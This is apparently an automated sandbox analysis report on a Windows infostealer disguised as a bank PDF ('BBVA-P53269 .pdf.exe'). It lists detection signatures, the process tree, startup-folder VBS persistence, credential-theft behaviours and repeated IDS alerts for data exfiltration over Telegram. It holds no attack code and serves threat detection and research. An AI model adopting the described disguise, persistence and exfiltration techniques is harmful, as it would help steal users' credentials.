Windows Analysis Report
BBVA-P53269 .pdf.exe

Overview

General Information

Sample name: BBVA-P53269 .pdf.exe
Analysis ID: 1629827
MD5: 344f646104b4b93a0e7244d2ef66c049
SHA1: b6fc87f66c8a38a196f690e5b148f05ff80a4392
SHA256: 75b2472b562f8ae20e5ebc2f6c32a8a3eb1883b25c920000db1597ada8961076
Tags: BBVA, exe, user-abuse_ch

Detection

Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Sigma detected: Suspicious Double Extension File Execution
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Generic Dropper
.NET source code contains potential unpacker
Drops VBS files to the startup folder
Initial sample is a PE file and has a suspicious name
Joe Sandbox ML detected suspicious sample
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses an obfuscated file name to hide its real file extension (double extension)
Uses the Telegram API (likely for C&C communication)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Yara detected Costura Assembly Loader
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected non-DNS traffic on DNS port
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • BBVA-P53269 .pdf.exe (PID: 7844 cmdline: "C:\Users\user\Desktop\BBVA-P53269 .pdf.exe" MD5: 344F646104B4B93A0E7244D2EF66C049)
    • InstallUtil.exe (PID: 6260 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 6156 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • AllData.exe (PID: 7936 cmdline: "C:\Users\user\AppData\Roaming\AllData.exe" MD5: 344F646104B4B93A0E7244D2EF66C049)
      • InstallUtil.exe (PID: 5900 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000004.00000002.1333737955.0000000004281000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000009.00000002.1469533149.0000000003568000.00000004.00000800.00020000.00000000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth | 0x2c890:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmp | LokiBot_Dropper_Packed_R11_Feb18 | Auto-generated rule - file scan copy.pdf.r11 | Florian Roth | 0x2d340:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
00000004.00000002.1314628182.0000000003165000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
00000004.00000002.1338063941.00000000065F0000.00000004.08000000.00040000.00000000.sdmp | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
Source | Rule | Description | Author | Strings
4.2.BBVA-P53269 .pdf.exe.65f0000.6.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |
4.2.BBVA-P53269 .pdf.exe.65f0000.6.raw.unpack | JoeSecurity_CosturaAssemblyLoader | Yara detected Costura Assembly Loader | Joe Security |

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems), @blu3_team (idea), Nasreddine Bencherchali (Nextron Systems); Data: Command: "C:\Users\user\Desktop\BBVA-P53269 .pdf.exe", CommandLine: "C:\Users\user\Desktop\BBVA-P53269 .pdf.exe", CommandLine|base64offset|contains: , Image: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe, NewProcessName: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe, OriginalFileName: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Users\user\Desktop\BBVA-P53269 .pdf.exe", ProcessId: 7844, ProcessName: BBVA-P53269 .pdf.exe
Source: Process started; Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" , ProcessId: 6156, ProcessName: wscript.exe
Source: Process started; Author: Michael Haag; Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 3968, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs" , ProcessId: 6156, ProcessName: wscript.exe

Data Obfuscation

Source: File created; Author: Joe Security; Data: EventID: 11, Image: C:\Users\user\Desktop\BBVA-P53269 .pdf.exe, ProcessId: 7844, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\AllData.vbs
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2025-03-05T08:24:59.060325+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49716 | 162.55.60.2 | 80 | TCP
2025-03-05T08:25:11.579109+0100 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.10 | 49793 | 162.55.60.2 | 80 | TCP
            2025-03-05T08:27:21.785477+010018100081Potentially Bad Traffic192.168.2.1060421149.154.167.220443TCP
            2025-03-05T08:27:24.516796+010018100081Potentially Bad Traffic192.168.2.1060422149.154.167.220443TCP
            2025-03-05T08:27:27.263287+010018100081Potentially Bad Traffic192.168.2.1060423149.154.167.220443TCP
            2025-03-05T08:27:30.098971+010018100081Potentially Bad Traffic192.168.2.1060424149.154.167.220443TCP
            2025-03-05T08:27:32.837841+010018100081Potentially Bad Traffic192.168.2.1060425149.154.167.220443TCP
            2025-03-05T08:27:35.622540+010018100081Potentially Bad Traffic192.168.2.1060426149.154.167.220443TCP
            2025-03-05T08:27:38.330104+010018100081Potentially Bad Traffic192.168.2.1060427149.154.167.220443TCP
            2025-03-05T08:27:41.081114+010018100081Potentially Bad Traffic192.168.2.1060428149.154.167.220443TCP
            2025-03-05T08:27:44.517501+010018100081Potentially Bad Traffic192.168.2.1060429149.154.167.220443TCP
            2025-03-05T08:27:47.461674+010018100081Potentially Bad Traffic192.168.2.1060430149.154.167.220443TCP
            2025-03-05T08:27:50.355773+010018100081Potentially Bad Traffic192.168.2.1060431149.154.167.220443TCP
            2025-03-05T08:27:53.057432+010018100081Potentially Bad Traffic192.168.2.1060432149.154.167.220443TCP
            2025-03-05T08:27:55.831401+010018100081Potentially Bad Traffic192.168.2.1060433149.154.167.220443TCP
            2025-03-05T08:27:58.577634+010018100081Potentially Bad Traffic192.168.2.1060434149.154.167.220443TCP
            2025-03-05T08:28:01.365322+010018100081Potentially Bad Traffic192.168.2.1060435149.154.167.220443TCP
            2025-03-05T08:28:04.321002+010018100081Potentially Bad Traffic192.168.2.1060436149.154.167.220443TCP
            2025-03-05T08:28:07.525794+010018100081Potentially Bad Traffic192.168.2.1060437149.154.167.220443TCP
            2025-03-05T08:28:10.263978+010018100081Potentially Bad Traffic192.168.2.1060438149.154.167.220443TCP
            2025-03-05T08:28:12.981548+010018100081Potentially Bad Traffic192.168.2.1060439149.154.167.220443TCP
            2025-03-05T08:28:16.159955+010018100081Potentially Bad Traffic192.168.2.1060440149.154.167.220443TCP
            2025-03-05T08:28:18.911415+010018100081Potentially Bad Traffic192.168.2.1060441149.154.167.220443TCP
            2025-03-05T08:28:21.634079+010018100081Potentially Bad Traffic192.168.2.1060442149.154.167.220443TCP
            2025-03-05T08:28:24.407992+010018100081Potentially Bad Traffic192.168.2.1060443149.154.167.220443TCP
            2025-03-05T08:28:27.169913+010018100081Potentially Bad Traffic192.168.2.1060444149.154.167.220443TCP
            2025-03-05T08:28:29.955423+010018100081Potentially Bad Traffic192.168.2.1060445149.154.167.220443TCP
            2025-03-05T08:28:32.724069+010018100081Potentially Bad Traffic192.168.2.1060446149.154.167.220443TCP
            2025-03-05T08:28:35.393041+010018100081Potentially Bad Traffic192.168.2.1060447149.154.167.220443TCP
            2025-03-05T08:28:38.107877+010018100081Potentially Bad Traffic192.168.2.1060448149.154.167.220443TCP
            2025-03-05T08:28:40.820652+010018100081Potentially Bad Traffic192.168.2.1060449149.154.167.220443TCP
            2025-03-05T08:28:43.522152+010018100081Potentially Bad Traffic192.168.2.1060450149.154.167.220443TCP
            2025-03-05T08:28:46.258802+010018100081Potentially Bad Traffic192.168.2.1060451149.154.167.220443TCP
            2025-03-05T08:28:49.013629+010018100081Potentially Bad Traffic192.168.2.1060452149.154.167.220443TCP
            2025-03-05T08:28:51.714257+010018100081Potentially Bad Traffic192.168.2.1060453149.154.167.220443TCP
            2025-03-05T08:28:54.459951+010018100081Potentially Bad Traffic192.168.2.1060454149.154.167.220443TCP
            2025-03-05T08:28:57.189541+010018100081Potentially Bad Traffic192.168.2.1060455149.154.167.220443TCP
            2025-03-05T08:28:59.961048+010018100081Potentially Bad Traffic192.168.2.1060456149.154.167.220443TCP


            AV Detection

            Source: C:\Users\user\AppData\Roaming\AllData.exe | ReversingLabs: Detection: 52%
            Source: BBVA-P53269 .pdf.exe | Virustotal: Detection: 40%
            Source: BBVA-P53269 .pdf.exe | ReversingLabs: Detection: 52%
            Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability
            Source: BBVA-P53269 .pdf.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: unknown | HTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.10:49704 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 204.44.192.90:443 -> 192.168.2.10:49772 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49915 version: TLS 1.2
            Source: unknown | HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:60380 version: TLS 1.2
            Source: BBVA-P53269 .pdf.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e | source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338873710.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.00000000037CD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: W.pdb4 | source: BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000041F5000.00000004.00000800.00020000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000006.00000002.3746600843.0000000000401000.00000040.00000400.00020000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.0000000003568000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb | source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338873710.0000000006E90000.00000004.08000000.00040000.00000000.sdmp, AllData.exe, 00000009.00000002.1469533149.00000000037CD000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: protobuf-net.pdbSHA256}Lq | source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp
            Source: Binary string: protobuf-net.pdb | source: BBVA-P53269 .pdf.exe, 00000004.00000002.1338604473.0000000006840000.00000004.08000000.00040000.00000000.sdmp, BBVA-P53269 .pdf.exe, 00000004.00000002.1333737955.00000000040B1000.00000004.00000800.00020000.00000000.sdmp
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\
            Source: C:\Windows\System32\wscript.exe | File opened: C:\Users\user\
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Code function: 4x nop then push ebp | 11_2_0044B930

            Networking

            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49915 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:49915 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49954 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:49936 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:49936 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:49936 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:49915 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60386 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60386 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60386 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60390 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60390 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:49954 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60390 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60392 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60392 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:49954 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60392 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60397 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60397 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60397 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60382 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60382 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60421 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60421 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60430 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60382 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60430 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60430 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60404 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60404 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60421 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60435 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60385 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60404 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60385 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60391 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60385 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60391 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60391 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60434 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60434 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60398 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60434 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60401 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60401 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60401 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60444 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60444 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60447 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60447 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60444 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60422 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60422 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60432 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60422 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60389 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60389 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60389 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60453 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60453 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60384 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60384 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60453 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60456 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60456 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60435 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60456 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60437 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60384 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60383 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60380 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60380 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60414 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60414 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60450 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60450 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60414 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60380 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60450 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60383 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 1810008 - Severity 1 - Joe Security ANOMALY Telegram Send File : 192.168.2.10:60439 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2852388 - Severity 1 - ETPRO MALWARE DarkCloud/BluStealer - SysInfo Exfil via Telegram M4 : 192.168.2.10:60439 -> 149.154.167.220:443
            Source: Network traffic | Suricata IDS: 2045300 - Severity 1 - ET MALWARE DarkCloud Stealer Key Logger Function Exfiltrating Data via Telegram : 192.168.2.10:60383 -> 149.154.167.220:443
